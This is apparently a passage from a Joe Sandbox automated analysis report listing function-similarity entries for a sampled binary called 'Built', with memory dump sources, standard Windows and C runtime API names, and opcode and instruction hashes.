                                                                      • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                      • Instruction ID: 458f2ce71b43a27e06bc881334e9649ee0d8683f66b9631d7c4f1d92e81d0303
                                                                      • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                      • Instruction Fuzzy Hash: 1591E632F2C652C5F760EF6594602BDABA0BB08B89F944139DE1E56E86EF38D441C734
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1279662727-0
                                                                      • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                      • Instruction ID: b2ddc5d05920a2b1e720d7c39f6b679bb479ad9be51ccdb2a1caf50ed151d5a5
                                                                      • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                      • Instruction Fuzzy Hash: 6541A622D2C78283E714AF219520379A251FB98764F509334EEAC03ED6EF7CA1E08724
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 3251591375-0
                                                                      • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                      • Instruction ID: 1d15394fc232dadb7ac95c06d78cbbb7b2f5d2f9e0a05e88802c2c47313d61a7
                                                                      • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                      • Instruction Fuzzy Hash: 92314821E2C243C5FA24BB6594613B99391AF45385FC45038ED0E5BED3FF6DA805CA35
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                      • Instruction ID: ac42335e2e26a6da1f525f30612d404407efba4ba97f9ba07958a97e66012497
                                                                      • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                      • Instruction Fuzzy Hash: 4BD01710B3C70AC2EB183B705C6913982111F6C702F802638CC6B06B93ED2CA8088271
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                      • Instruction ID: 39cb791920302ef4c6ae9983d04cfcaeaa8e7c8e5090be18153ca7926446163f
                                                                      • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                                      • Instruction Fuzzy Hash: 1051C661B2E242C6F628BE25940067AE291BF44BB4F944639DE7D47BD7EE3CD4418E30
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9ED6
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5D9CE5,?,?,00000000,00007FF76D5D9D9A), ref: 00007FF76D5D9EE0
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                      • String ID:
                                                                      • API String ID: 1687624791-0
                                                                      • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                      • Instruction ID: 8d565cfb5897365f9796d3209cef660bede627e37ac01b6aa85e6b445627a1bf
                                                                      • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                      • Instruction Fuzzy Hash: 4021C211F3C64280EA54B761A4B037C92929F847A0F841235DD3E47AD3EE6CA5808739
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastPointer
                                                                      • String ID:
                                                                      • API String ID: 2976181284-0
                                                                      • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                      • Instruction ID: cb5bd3e4cc8b5e057e8bd0dc03b2afb35d142b7d9d3466d5b2ead6f6e8cfeb58
                                                                      • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                                      • Instruction Fuzzy Hash: BD11C461A2CB81C1DB10FB25B554169A362AB48BF4F940331EE7D07BEAEE7CD1508754
                                                                      APIs
                                                                      • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                      • String ID:
                                                                      • API String ID: 588628887-0
                                                                      • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                      • Instruction ID: 745cbc7dc603e88975c203fe418b648da96f7ad396c209a091e6561646013309
                                                                      • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                      • Instruction Fuzzy Hash: 5FE04F10F2C647C2FB187BB1646517992915F9C782B804030CD1D42A63FE2C68854634
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                      • Instruction ID: f1c944ae47175a2a0f962628a90659ba0569bec227d3d93f9a77630d06030a33
                                                                      • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                      • Instruction Fuzzy Hash: 4F41E63292C201C7EB24BF15A56127DB3A1EB56B80F540131DEAE43A96EF3DE402C775
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 840049012-0
                                                                      • Opcode ID: 5ded6caf1fd380de2254f36795121f8b4b736111aab3f4dc2bf888ad56e5caf9
                                                                      • Instruction ID: d5ef1775c7c8e26880a6c61200d845f6e558b49e5e7d89331b1a3fb069e53926
                                                                      • Opcode Fuzzy Hash: 5ded6caf1fd380de2254f36795121f8b4b736111aab3f4dc2bf888ad56e5caf9
                                                                      • Instruction Fuzzy Hash: D3219121F2D65685FA10BA16A9043BAE691BF49BD4FC85434DD1D07F83EEBDE041CA30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                      • Instruction ID: bcafe4651ad1ef7a36ab0a2c0a6fafa4312909ee39c45119d71527b8008a285c
                                                                      • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                      • Instruction Fuzzy Hash: 8431A421E2C645C2F7117B15846177EA650AB64BA1F910135ED3D13BE3EFBCE4818739
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                      • String ID:
                                                                      • API String ID: 3947729631-0
                                                                      • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                      • Instruction ID: c0de4416671398b934e759df0d2bf9c19da8473efbb62c5a5ff14cd5a878841a
                                                                      • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                      • Instruction Fuzzy Hash: F721A132E29705C9EB25AF64C4502FC7BA0FB04318F94563ADA2C0AED6EF38D544CB65
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                      • Instruction ID: 0fda83ee3f10ff6cd6216f0a38b5fca5da58ddacb1e294859f870b8c1bbb622d
                                                                      • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                      • Instruction Fuzzy Hash: 4C118421A2D682C1EA61BF55942017EE264FF56B80FC44431EEAC57E9BEF3CD4408778
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                      • Instruction ID: eef46f1205c2529964929e8f807375d1985ad6d3f4f67a09118ebfc87a25112a
                                                                      • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                      • Instruction Fuzzy Hash: 1821A732A2C681C7DB61AF28D450379B7A0EB98B94F944234DE6D47ADAEF3CD440CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                      • Instruction ID: c75a6dcb5963d74dfd2af19718cdedb5d1ea1223bc91fda18a02d6881dabb32b
                                                                      • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                      • Instruction Fuzzy Hash: 9201A521B2C74281E904BB565900079E6D5AB55FE0F884635DE6C13FD7EE3CE4028B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                      • Instruction ID: 436f51badd0115fddd3d1ac18402658f831718affad0d1c6ce26bd82ff49325f
                                                                      • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                      • Instruction Fuzzy Hash: 50015E20E2D6C2C1FAA0BA656561179D290AF597D4FD40134FD7E42ECBFF7DA4404239
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF76D5DA63A,?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A), ref: 00007FF76D5DDEFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                      • Instruction ID: 0dc7e60e3cb84121f66f2fc7a58aad7618ffb42e11caa45fe7b353c5592a7cc8
                                                                      • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                      • Instruction Fuzzy Hash: 40F04F55B2D347C0FE64766558313B5A2909F98B80FC84031CD1E86B87FD2CA4814634
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF76D5CFFB0,?,?,?,00007FF76D5D161A,?,?,?,?,?,00007FF76D5D2E09), ref: 00007FF76D5DC94A
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                      • Instruction ID: 93b2e833fcd6504b7b8eebb542a3306ea0106ff146cd5c7e8bd45f97efccf994
                                                                      • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                      • Instruction Fuzzy Hash: CAF0DA11E3D247C5FE547B61596127991805F4CBA0F884630ED3E45ACBFE6CB5418634
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                      • Instruction ID: bb78586ccc9a51dea0b1e04acd8ba2d28d81a409b72bc9464b87eaebc419fe59
                                                                      • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                      • Instruction Fuzzy Hash: DEE0EC90E2C247C3FA147AA845E227991109FA8340FC04070DD6A46A83FD2C7885963A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
